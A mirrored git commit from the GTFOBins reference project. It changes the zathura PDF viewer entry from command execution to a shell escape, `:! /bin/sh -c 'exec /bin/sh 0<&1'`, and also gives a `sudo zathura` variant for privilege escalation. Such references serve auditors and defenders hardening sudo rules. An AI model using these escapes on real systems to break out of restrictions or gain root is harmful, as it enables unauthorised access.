1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00

Promote zathura command to shell

Related to #293.
This commit is contained in:
Andrea Cardaci 2022-06-08 13:41:12 +02:00
parent 4c7de76975
commit 3cdfea5714

View File

@ -1,11 +1,12 @@
--- ---
description: The interaction happens in a GUI window, while the shell is dropped in the terminal.
functions: functions:
command: shell:
- code: | - code: |
zathura zathura
:! id :! /bin/sh -c 'exec /bin/sh 0<&1'
sudo: sudo:
- code: | - code: |
sudo zathura sudo zathura
:! id :! /bin/sh -c 'exec /bin/sh 0<&1'
--- ---